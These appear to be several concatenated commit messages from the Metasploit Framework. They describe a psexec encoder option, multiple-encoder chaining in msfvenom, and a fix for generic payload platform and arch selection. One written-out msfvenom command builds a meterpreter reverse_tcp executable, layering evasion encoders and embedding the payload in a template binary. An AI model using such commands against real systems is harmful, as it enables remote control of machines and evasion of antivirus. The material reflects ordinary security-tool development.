Add psexec option SERCVICE_STUB_ENCODER to allow a list of encoder to
encode the x86/service stub.
Add multiple_encode_payload function in payload_generator.rb to accept a
list of encoder (beginning with @ to not break the classic parsing of
encoder).
With this it would be possible to pass multiple encoder to msfvenom in
one execution.
./msfvenom -p windows/meterpreter/reverse_tcp LPORT=80
LHOST=192.168.100.11 -e
@x86/shikata_ga_nai,x86/misc_anti_emu:5,x86/shikata_ga_nai -x
template.exe -f exe-only -o meterpreter.exe
This fixes#4866, an issue with msfvenom not properly handling special
cases with generic payloads. So the story behind this fix is that
we have these two problems:
Problem 1: The current payload selection design relies on the payload
module in order to set the platform and arch. Almost all MSF payloads
contain a default platform and arch, however, the bind and reverse
generic payloads don't.
Problem 2: By default, Msf::Payload::Generic also explicitly sets the
PLATFORM and ARCH datastore options to nil. So there is no way the
payload generator can figure out what platform and arch to use.
As a result of these problems, msfvenom will actually end up getting
a Msf::Module::Platform as the default platform, which doesn't
actually represent any valid platform we can use (such as
Msf::Module::Platform::Windows). And the first item of ARCH_ALL for
the arch.
In addition, msfvenom has these two arguments that the user can use:
--platform and --arch. In most cases, these arguments are used more
like checks than actually setting anything. Because remember:
Framework's payload selector retreives the platform & arch from the
module (trusted), not the user input (untrusted). But from the user's
perspective it's impossible to know this.
After experimenting different ways to fix this, I came up with this
patch. It feels sort of more like a hack than a real fix, but as
far as I can tell, this is the best you can get unless you want to
redesign generic payload selection.
This fixes a huge number of hard-to-detect runtime bugs
that occur when a default utf-8 string from one of these
libraries is passed into a method expecting ascii-8bit